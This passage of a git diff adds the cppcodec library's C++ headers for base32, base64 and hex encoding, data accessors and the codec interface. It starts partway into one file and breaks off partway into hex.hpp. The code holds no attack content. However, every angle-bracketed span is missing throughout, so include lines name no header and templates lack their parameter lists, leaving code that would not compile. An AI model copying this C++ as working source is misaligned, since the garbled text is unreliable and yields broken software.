+} // namespace detail + +using base64_url_unpadded = detail::codec>; + +} // namespace cppcodec + +#endif // CPPCODEC_BASE64_URL_UNPADDED diff --git a/Src/Common/CppCodec/data/access.hpp b/Src/Common/CppCodec/data/access.hpp new file mode 100644 index 0000000..61802e8 --- /dev/null +++ b/Src/Common/CppCodec/data/access.hpp @@ -0,0 +1,180 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_DETAIL_DATA_ACCESS +#define CPPCODEC_DETAIL_DATA_ACCESS + +#include // for size_t + +namespace cppcodec { +namespace data { + +// This file contains a number of templated data accessors that can be +// implemented in the cppcodec::data namespace for types that don't fulfill +// the default type requirements: +// For result types: init(Result&, ResultState&, size_t capacity), +// put(Result&, ResultState&, char), finish(Result&, State&) +// For const (read-only) types: char_data(const T&) +// For both const and result types: size(const T&) + +template inline size_t size(const T& t) { return t.size(); } +template inline constexpr size_t size(const T (&t)[N]) noexcept { + return N * sizeof(t[0]); +} + +class general_t {}; +class specific_t : public general_t {}; + +class empty_result_state { + template inline void size(const Result& result) { return size(result); } +}; + +// SFINAE: Generic fallback in case no specific state function applies. +template +inline empty_result_state create_state(Result&, general_t) { return empty_result_state(); } + +// +// Generic templates for containers: Use these init()/put()/finish() +// implementations if no specialization was found. +// + +template +inline void init(Result& result, empty_result_state&, size_t capacity) +{ + result.resize(0); + result.reserve(capacity); +} + +template +inline void finish(Result&, empty_result_state&) +{ + // Default is to push_back(), which already increases the size. +} + +// For the put() default implementation, we try calling push_back() with either uint8_t or char, +// whichever compiles. Scary-fancy template magic from http://stackoverflow.com/a/1386390. +namespace fallback { + struct flag { char c[2]; }; // sizeof > 1 + flag put_uint8(...); + + int operator,(flag, flag); + template void operator,(flag, T&); // map everything else to void + char operator,(int, flag); // sizeof 1 +} + +template inline void put_uint8(Result& result, uint8_t c) { result.push_back(c); } + +template struct put_impl; +template <> struct put_impl { // put_uint8() available + template static void put(Result& result, uint8_t c) { put_uint8(result, c); } +}; +template <> struct put_impl { // put_uint8() not available + template static void put(Result& result, uint8_t c) { + result.push_back(static_cast(c)); + } +}; + +template inline void put(Result& result, empty_result_state&, uint8_t c) +{ + using namespace fallback; + put_impl::put(result, c); +} + +// +// Specialization for container types with direct mutable data access. +// The expected way to specialize is to subclass empty_result_state and +// return an instance of it from a create_state() template specialization. +// You can then create overloads for init(), put() and finish() +// that are more specific than the empty_result_state ones above. +// See the example below for direct access to a mutable data() method. +// +// If desired, a non-templated overload for both specific types +// (result & state) can be added to tailor it to that particular result type. +// + +template class direct_data_access_result_state : empty_result_state +{ +public: + using result_type = Result; + + inline void init(Result& result, size_t capacity) + { + // resize(0) is not called here since we don't rely on it + result.reserve(capacity); + } + inline void put(Result& result, char c) + { + // This only compiles if decltype(data) == char* + result.data()[m_offset++] = static_cast(c); + } + inline void finish(Result& result) + { + result.resize(m_offset); + } + inline size_t size(const Result&) + { + return m_offset; + } +private: + size_t m_offset = 0; +}; + +// SFINAE: Select a specific state based on the result type and possible result state type. +// Implement this if direct data access (`result.data()[0] = 'x') isn't already possible +// and you want to specialize it for your own result type. +template ::result_type::value> +inline ResultState create_state(Result&, specific_t) { return ResultState(); } + +template +inline void init(Result& result, direct_data_access_result_state& state, size_t capacity) +{ + state.init(result); +} + +// Specialized put function for direct_data_access_result_state. +template +inline void put(Result& result, direct_data_access_result_state& state, char c) +{ + state.put(result, c); +} + +// char_data() is only used to read, not for result buffers. +template inline const char* char_data(const T& t) +{ + return reinterpret_cast(t.data()); +} +template inline const char* char_data(const T (&t)[N]) noexcept +{ + return reinterpret_cast(&(t[0])); +} + +template inline const uint8_t* uchar_data(const T& t) +{ + return reinterpret_cast(char_data(t)); +} + +} // namespace data +} // namespace cppcodec + +#endif diff --git a/Src/Common/CppCodec/data/raw_result_buffer.hpp b/Src/Common/CppCodec/data/raw_result_buffer.hpp new file mode 100644 index 0000000..716c2e6 --- /dev/null +++ b/Src/Common/CppCodec/data/raw_result_buffer.hpp @@ -0,0 +1,71 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_DETAIL_RAW_RESULT_BUFFER +#define CPPCODEC_DETAIL_RAW_RESULT_BUFFER + +#include // for size_t +#include // for abort() + +#include "access.hpp" + +namespace cppcodec { +namespace data { + +class raw_result_buffer +{ +public: + raw_result_buffer(char* data, size_t capacity) + : m_ptr(data + capacity) + , m_begin(data) + { + } + + char last() const { return *(m_ptr - 1); } + void push_back(char c) { *m_ptr = c; ++m_ptr; } + size_t size() const { return m_ptr - m_begin; } + void resize(size_t size) { m_ptr = m_begin + size; } + +private: + char* m_ptr; + char* m_begin; +}; + + +template <> inline void init( + raw_result_buffer& result, empty_result_state&, size_t capacity) +{ + // This version of init() doesn't do a reserve(), and instead checks whether the + // initial size (capacity) is enough before resizing to 0. + // The codec is expected not to exceed this capacity. + if (capacity > result.size()) { + abort(); + } + result.resize(0); +} +template <> inline void finish(raw_result_buffer&, empty_result_state&) { } + +} // namespace data +} // namespace cppcodec + +#endif diff --git a/Src/Common/CppCodec/detail/base32.hpp b/Src/Common/CppCodec/detail/base32.hpp new file mode 100644 index 0000000..1902395 --- /dev/null +++ b/Src/Common/CppCodec/detail/base32.hpp @@ -0,0 +1,148 @@ +/** + * Copyright (C) 2015 Trustifier Inc. + * Copyright (C) 2015 Ahmed Masud + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + * + * Adapted from https://github.com/ahmed-masud/libbase32, + * commit 79761b2b79b0545697945efe0987a8d3004512f9. + * Quite different now. + */ + +#ifndef CPPCODEC_DETAIL_BASE32 +#define CPPCODEC_DETAIL_BASE32 + +#include +#include // for abort() + +#include "../data/access.hpp" +#include "../parse_error.hpp" +#include "config.hpp" +#include "stream_codec.hpp" + +namespace cppcodec { +namespace detail { + +template +class base32 : public CodecVariant::template codec_impl> +{ +public: + static inline constexpr uint8_t binary_block_size() { return 5; } + static inline constexpr uint8_t encoded_block_size() { return 8; } + + static CPPCODEC_ALWAYS_INLINE constexpr uint8_t num_encoded_tail_symbols(uint8_t num_bytes) + { + return (num_bytes == 1) ? 2 // 2 symbols, 6 padding characters + : (num_bytes == 2) ? 4 // 4 symbols, 4 padding characters + : (num_bytes == 3) ? 5 // 5 symbols, 3 padding characters + : (num_bytes == 4) ? 7 // 7 symbols, 1 padding characters + : throw std::domain_error("invalid number of bytes in a tail block"); + } + + template CPPCODEC_ALWAYS_INLINE static constexpr uint8_t index( + const uint8_t* b /*binary block*/) + { + return (I == 0) ? ((b[0] >> 3) & 0x1F) // first 5 bits + : (I == 1) ? (((b[0] << 2) & 0x1C) | ((b[1] >> 6) & 0x3)) + : (I == 2) ? ((b[1] >> 1) & 0x1F) + : (I == 3) ? (((b[1] << 4) & 0x10) | ((b[2] >> 4) & 0xF)) + : (I == 4) ? (((b[2] << 1) & 0x1E) | ((b[3] >> 7) & 0x1)) + : (I == 5) ? ((b[3] >> 2) & 0x1F) + : (I == 6) ? (((b[3] << 3) & 0x18) | ((b[4] >> 5) & 0x7)) + : (I == 7) ? (b[4] & 0x1F) // last 5 bits + : throw std::domain_error("invalid encoding symbol index in a block"); + } + + template CPPCODEC_ALWAYS_INLINE static constexpr uint8_t index_last( + const uint8_t* b /*binary block*/) + { + return (I == 1) ? ((b[0] << 2) & 0x1C) // abbreviated 2nd symbol + : (I == 3) ? ((b[1] << 4) & 0x10) // abbreviated 4th symbol + : (I == 4) ? ((b[2] << 1) & 0x1E) // abbreviated 5th symbol + : (I == 6) ? ((b[3] << 3) & 0x18) // abbreviated 7th symbol + : throw std::domain_error("invalid last encoding symbol index in a tail"); + } + + template + static void decode_block(Result& decoded, ResultState&, const uint8_t* idx); + + template + static void decode_tail(Result& decoded, ResultState&, const uint8_t* idx, size_t idx_len); +}; + +// +// 11111111 10101010 10110011 10111100 10010100 +// => 11111 11110 10101 01011 00111 01111 00100 10100 +// + +template +template +inline void base32::decode_block( + Result& decoded, ResultState& state, const uint8_t* idx) +{ + put(decoded, state, static_cast(((idx[0] << 3) & 0xF8) | ((idx[1] >> 2) & 0x7))); + put(decoded, state, static_cast(((idx[1] << 6) & 0xC0) | ((idx[2] << 1) & 0x3E) | ((idx[3] >> 4) & 0x1))); + put(decoded, state, static_cast(((idx[3] << 4) & 0xF0) | ((idx[4] >> 1) & 0xF))); + put(decoded, state, static_cast(((idx[4] << 7) & 0x80) | ((idx[5] << 2) & 0x7C) | ((idx[6] >> 3) & 0x3))); + put(decoded, state, static_cast(((idx[6] << 5) & 0xE0) | (idx[7] & 0x1F))); +} + +template +template +inline void base32::decode_tail( + Result& decoded, ResultState& state, const uint8_t* idx, size_t idx_len) +{ + if (idx_len == 1) { + throw invalid_input_length( + "invalid number of symbols in last base32 block: found 1, expected 2, 4, 5 or 7"); + } + if (idx_len == 3) { + throw invalid_input_length( + "invalid number of symbols in last base32 block: found 3, expected 2, 4, 5 or 7"); + } + if (idx_len == 6) { + throw invalid_input_length( + "invalid number of symbols in last base32 block: found 6, expected 2, 4, 5 or 7"); + } + + // idx_len == 2: decoded size 1 + put(decoded, state, static_cast(((idx[0] << 3) & 0xF8) | ((idx[1] >> 2) & 0x7))); + if (idx_len == 2) { + return; + } + // idx_len == 4: decoded size 2 + put(decoded, state, static_cast(((idx[1] << 6) & 0xC0) | ((idx[2] << 1) & 0x3E) | ((idx[3] >> 4) & 0x1))); + if (idx_len == 4) { + return; + } + // idx_len == 5: decoded size 3 + put(decoded, state, static_cast(((idx[3] << 4) & 0xF0) | ((idx[4] >> 1) & 0xF))); + if (idx_len == 5) { + return; + } + // idx_len == 7: decoded size 4 + put(decoded, state, static_cast(((idx[4] << 7) & 0x80) | ((idx[5] << 2) & 0x7C) | ((idx[6] >> 3) & 0x3))); +} + +} // namespace detail +} // namespace cppcodec + +#endif // CPPCODEC_DETAIL_BASE32 diff --git a/Src/Common/CppCodec/detail/base64.hpp b/Src/Common/CppCodec/detail/base64.hpp new file mode 100644 index 0000000..9230f2c --- /dev/null +++ b/Src/Common/CppCodec/detail/base64.hpp @@ -0,0 +1,115 @@ +/** + * Copyright (C) 2015 Topology LP + * Copyright (C) 2013 Adam Rudd (bit calculations) + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + * + * Bit calculations adapted from https://github.com/adamvr/arduino-base64, + * commit 999595783185a0afcba156d7276dfeaa9cb5382f. + */ + +#ifndef CPPCODEC_DETAIL_BASE64 +#define CPPCODEC_DETAIL_BASE64 + +#include +#include + +#include "../data/access.hpp" +#include "../parse_error.hpp" +#include "config.hpp" +#include "stream_codec.hpp" + +namespace cppcodec { +namespace detail { + +template +class base64 : public CodecVariant::template codec_impl> +{ +public: + static inline constexpr uint8_t binary_block_size() { return 3; } + static inline constexpr uint8_t encoded_block_size() { return 4; } + + static CPPCODEC_ALWAYS_INLINE constexpr uint8_t num_encoded_tail_symbols(uint8_t num_bytes) + { + return (num_bytes == 1) ? 2 // 2 symbols, 2 padding characters + : (num_bytes == 2) ? 3 // 3 symbols, 1 padding character + : throw std::domain_error("invalid number of bytes in a tail block"); + } + + template CPPCODEC_ALWAYS_INLINE static constexpr uint8_t index( + const uint8_t* b /*binary block*/) + { + return (I == 0) ? (b[0] >> 2) // first 6 bits + : (I == 1) ? (((b[0] & 0x3) << 4) | (b[1] >> 4)) + : (I == 2) ? (((b[1] & 0xF) << 2) | (b[2] >> 6)) + : (I == 3) ? (b[2] & 0x3F) // last 6 bits + : throw std::domain_error("invalid encoding symbol index in a block"); + } + + template CPPCODEC_ALWAYS_INLINE static constexpr uint8_t index_last( + const uint8_t* b /*binary block*/) + { + return (I == 1) ? ((b[0] & 0x3) << 4) // abbreviated 2nd symbol + : (I == 2) ? ((b[1] & 0xF) << 2) // abbreviated 3rd symbol + : throw std::domain_error("invalid last encoding symbol index in a tail"); + } + + template + static void decode_block(Result& decoded, ResultState&, const uint8_t* idx); + + template + static void decode_tail(Result& decoded, ResultState&, const uint8_t* idx, size_t idx_len); +}; + + +template +template +inline void base64::decode_block( + Result& decoded, ResultState& state, const uint8_t* idx) +{ + data::put(decoded, state, static_cast((idx[0] << 2) + ((idx[1] & 0x30) >> 4))); + data::put(decoded, state, static_cast(((idx[1] & 0xF) << 4) + ((idx[2] & 0x3C) >> 2))); + data::put(decoded, state, static_cast(((idx[2] & 0x3) << 6) + idx[3])); +} + +template +template +inline void base64::decode_tail( + Result& decoded, ResultState& state, const uint8_t* idx, size_t idx_len) +{ + if (idx_len == 1) { + throw invalid_input_length( + "invalid number of symbols in last base64 block: found 1, expected 2 or 3"); + } + + // idx_len == 2: decoded size 1 + data::put(decoded, state, static_cast((idx[0] << 2) + ((idx[1] & 0x30) >> 4))); + if (idx_len == 2) { + return; + } + + // idx_len == 3: decoded size 2 + data::put(decoded, state, static_cast(((idx[1] & 0xF) << 4) + ((idx[2] & 0x3C) >> 2))); +} + +} // namespace detail +} // namespace cppcodec + +#endif // CPPCODEC_DETAIL_BASE64 diff --git a/Src/Common/CppCodec/detail/codec.hpp b/Src/Common/CppCodec/detail/codec.hpp new file mode 100644 index 0000000..47d9802 --- /dev/null +++ b/Src/Common/CppCodec/detail/codec.hpp @@ -0,0 +1,327 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_DETAIL_CODEC +#define CPPCODEC_DETAIL_CODEC + +#include +#include +#include +#include + +#include "../data/access.hpp" +#include "../data/raw_result_buffer.hpp" + +namespace cppcodec { +namespace detail { + +// SFINAE: Templates sometimes beat sensible overloads - make sure we don't call the wrong one. +template +struct non_numeric : std::enable_if::value> { }; + + +/** + * Public interface for all the codecs. For API documentation, see README.md. + */ +template +class codec +{ +public: + // + // Encoding + + // Convenient version, returns an std::string. + static std::string encode(const uint8_t* binary, size_t binary_size); + static std::string encode(const char* binary, size_t binary_size); + // static std::string encode(const T& binary); -> provided by template below + + // Convenient version with templated result type. + template static Result encode(const uint8_t* binary, size_t binary_size); + template static Result encode(const char* binary, size_t binary_size); + template > + static Result encode(const T& binary); + + // Reused result container version. Resizes encoded_result before writing to it. + template + static void encode(Result& encoded_result, const uint8_t* binary, size_t binary_size); + template + static void encode(Result& encoded_result, const char* binary, size_t binary_size); + template ::type* = nullptr> + static void encode(Result& encoded_result, const T& binary); + + // Raw pointer output, assumes pre-allocated memory with size > encoded_size(binary_size). + static size_t encode( + char* encoded_result, size_t encoded_buffer_size, + const uint8_t* binary, size_t binary_size) noexcept; + static size_t encode( + char* encoded_result, size_t encoded_buffer_size, + const char* binary, size_t binary_size) noexcept; + template + static size_t encode( + char* encoded_result, size_t encoded_buffer_size, + const T& binary) noexcept; + + // Calculate the exact length of the encoded string based on binary size. + static constexpr size_t encoded_size(size_t binary_size) noexcept; + + // + // Decoding + + // Convenient version, returns an std::vector. + static std::vector decode(const char* encoded, size_t encoded_size); + // static std::vector decode(const T& encoded); -> provided by template below + + // Convenient version with templated result type. + template static Result decode(const char* encoded, size_t encoded_size); + template , typename T = std::string> + static Result decode(const T& encoded); + + // Reused result container version. Resizes binary_result before writing to it. + template + static void decode(Result& binary_result, const char* encoded, size_t encoded_size); + template ::type* = nullptr> + static void decode(Result& binary_result, const T& encoded); + + // Raw pointer output, assumes pre-allocated memory with size > decoded_max_size(encoded_size). + static size_t decode( + uint8_t* binary_result, size_t binary_buffer_size, + const char* encoded, size_t encoded_size); + static size_t decode( + char* binary_result, size_t binary_buffer_size, + const char* encoded, size_t encoded_size); + template static size_t decode( + uint8_t* binary_result, size_t binary_buffer_size, const T& encoded); + template static size_t decode( + char* binary_result, size_t binary_buffer_size, const T& encoded); + + // Calculate the maximum size of the decoded binary buffer based on the encoded string length. + static constexpr size_t decoded_max_size(size_t encoded_size) noexcept; +}; + + +// +// Inline definitions of the above functions, using CRTP to call into CodecImpl +// + +// +// Encoding + +template +inline std::string codec::encode(const uint8_t* binary, size_t binary_size) +{ + return encode(binary, binary_size); +} + +template +inline std::string codec::encode(const char* binary, size_t binary_size) +{ + return encode(reinterpret_cast(binary), binary_size); +} + +template +template +inline Result codec::encode(const uint8_t* binary, size_t binary_size) +{ + Result encoded_result; + encode(encoded_result, binary, binary_size); + return encoded_result; +} + +template +template +inline Result codec::encode(const char* binary, size_t binary_size) +{ + return encode(reinterpret_cast(binary), binary_size); +} + +template +template +inline Result codec::encode(const T& binary) +{ + return encode(data::uchar_data(binary), data::size(binary)); +} + +template +template +inline void codec::encode( + Result& encoded_result, const uint8_t* binary, size_t binary_size) +{ + // This overload is where we reserve buffer capacity and call into CodecImpl. + size_t encoded_buffer_size = encoded_size(binary_size); + auto state = data::create_state(encoded_result, data::specific_t()); + data::init(encoded_result, state, encoded_buffer_size); + + CodecImpl::encode(encoded_result, state, binary, binary_size); + data::finish(encoded_result, state); + assert(data::size(encoded_result) == encoded_buffer_size); +} + +template +template +inline void codec::encode( + Result& encoded_result, const char* binary, size_t binary_size) +{ + encode(encoded_result, reinterpret_cast(binary), binary_size); +} + +template +template ::type*> +inline void codec::encode(Result& encoded_result, const T& binary) +{ + encode(encoded_result, data::uchar_data(binary), data::size(binary)); +} + +template +inline size_t codec::encode( + char* encoded_result, size_t encoded_buffer_size, + const uint8_t* binary, size_t binary_size) noexcept +{ + // This overload is where we wrap the result pointer & size. + data::raw_result_buffer encoded(encoded_result, encoded_buffer_size); + encode(encoded, binary, binary_size); + + size_t encoded_size = data::size(encoded); + if (encoded_size < encoded_buffer_size) { + encoded_result[encoded_size] = '\0'; + } + return encoded_size; +} + +template +inline size_t codec::encode( + char* encoded_result, size_t encoded_buffer_size, + const char* binary, size_t binary_size) noexcept +{ + // This overload is where we wrap the result pointer & size. + return encode(encoded_result, encoded_buffer_size, + reinterpret_cast(binary), binary_size); +} + +template +template +inline size_t codec::encode( + char* encoded_result, size_t encoded_buffer_size, + const T& binary) noexcept +{ + return encode(encoded_result, encoded_buffer_size, data::uchar_data(binary), data::size(binary)); +} + +template +inline constexpr size_t codec::encoded_size(size_t binary_size) noexcept +{ + return CodecImpl::encoded_size(binary_size); +} + + +// +// Decoding + +template +inline std::vector codec::decode(const char* encoded, size_t encoded_size) +{ + return decode>(encoded, encoded_size); +} + +template +template +inline Result codec::decode(const char* encoded, size_t encoded_size) +{ + Result result; + decode(result, encoded, encoded_size); + return result; +} + +template +template +inline Result codec::decode(const T& encoded) +{ + return decode(data::char_data(encoded), data::size(encoded)); +} + +template +template +inline void codec::decode(Result& binary_result, const char* encoded, size_t encoded_size) +{ + // This overload is where we reserve buffer capacity and call into CodecImpl. + size_t binary_buffer_size = decoded_max_size(encoded_size); + auto state = data::create_state(binary_result, data::specific_t()); + data::init(binary_result, state, binary_buffer_size); + + CodecImpl::decode(binary_result, state, encoded, encoded_size); + data::finish(binary_result, state); + assert(data::size(binary_result) <= binary_buffer_size); +} + + +template +template ::type*> +inline void codec::decode(Result& binary_result, const T& encoded) +{ + decode(binary_result, data::char_data(encoded), data::size(encoded)); +} + +template +inline size_t codec::decode( + uint8_t* binary_result, size_t binary_buffer_size, + const char* encoded, size_t encoded_size) +{ + return decode(reinterpret_cast(binary_result), binary_buffer_size, encoded, encoded_size); +} + +template +inline size_t codec::decode( + char* binary_result, size_t binary_buffer_size, + const char* encoded, size_t encoded_size) +{ + // This overload is where we wrap the result pointer & size. + data::raw_result_buffer binary(binary_result, binary_buffer_size); + decode(binary, encoded, encoded_size); + return data::size(binary); +} + +template +template +inline size_t codec::decode( + uint8_t* binary_result, size_t binary_buffer_size, const T& encoded) +{ + return decode(reinterpret_cast(binary_result), binary_buffer_size, encoded); +} + +template +template +inline size_t codec::decode(char* binary_result, size_t binary_buffer_size, const T& encoded) +{ + return decode(binary_result, binary_buffer_size, data::char_data(encoded), data::size(encoded)); +} + +template +inline constexpr size_t codec::decoded_max_size(size_t encoded_size) noexcept +{ + return CodecImpl::decoded_max_size(encoded_size); +} + + +} // namespace detail +} // namespace cppcodec + +#endif diff --git a/Src/Common/CppCodec/detail/config.hpp b/Src/Common/CppCodec/detail/config.hpp new file mode 100644 index 0000000..24150c4 --- /dev/null +++ b/Src/Common/CppCodec/detail/config.hpp @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_DETAIL_CONFIG_HPP +#define CPPCODEC_DETAIL_CONFIG_HPP + +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif + +#if __GNUC__ || __has_attribute(always_inline) +#define CPPCODEC_ALWAYS_INLINE inline __attribute__((always_inline)) +#else +#define CPPCODEC_ALWAYS_INLINE inline +#endif + +#endif // CPPCODEC_DETAIL_CONFIG_HPP + diff --git a/Src/Common/CppCodec/detail/hex.hpp b/Src/Common/CppCodec/detail/hex.hpp new file mode 100644 index 0000000..3089b66 --- /dev/null +++ b/Src/Common/CppCodec/detail/hex.hpp @@ -0,0 +1,115 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_DETAIL_HEX +#define CPPCODEC_DETAIL_HEX + +#include +#include // for abort() + +#include "../data/access.hpp" +#include "../parse_error.hpp" +#include "stream_codec.hpp" + +namespace cppcodec { +namespace detail { + +class hex_base +{ +public: + static inline constexpr uint8_t index_of(char c) + { + // Hex decoding is always case-insensitive (even in RFC 4648), + // it's only a question of what we want to encode ourselves. + return (c >= '0' && c <= '9') ? (c - '0') + : (c >= 'A' && c <= 'F') ? (c - 'A' + 10) + : (c >= 'a' && c <= 'f') ? (c - 'a' + 10) + : (c == '\0') ? 255 // stop at end of string + : throw symbol_error(c); + } + + // RFC4648 does not specify any whitespace being allowed in base64 encodings. + static inline constexpr bool should_ignore(uint8_t /*index*/) { return false; } + static inline constexpr bool is_special_character(uint8_t index) { return index > 64; } + static inline constexpr bool is_eof(uint8_t index) { return index == 255; } + + static inline constexpr bool generates_padding() { return false; } + // FIXME: doesn't require padding, but requires a multiple of the encoded block size (2) + static inline constexpr bool requires_padding() { return false; } + static inline constexpr bool is_padding_symbol(uint8_t /*index*/) { return false; } +}; + +template +class hex : public CodecVariant::template codec_impl> +{ +public: + static inline constexpr uint8_t binary_block_size() { return 1; } + static inline constexpr uint8_t encoded_block_size() { return 2; } + + static CPPCODEC_ALWAYS_INLINE constexpr uint8_t num_encoded_tail_symbols(uint8_t /*num_bytes*/) noexcept + { + return true ? 0 : throw std::domain_error("no tails in hex encoding, should never be called"); + } + + template CPPCODEC_ALWAYS_INLINE static constexpr uint8_t index( + const uint8_t* b /*binary block*/) noexcept + { + return (I == 0) ? (b[0] >> 4) // first 4 bits + : (I == 1) ? (b[0] & 0xF) // last 4 bits + : throw std::domain_error("invalid encoding symbol index in a block"); + } + + template CPPCODEC_ALWAYS_INLINE static constexpr uint8_t index_last( + const uint8_t* b /*binary block*/) 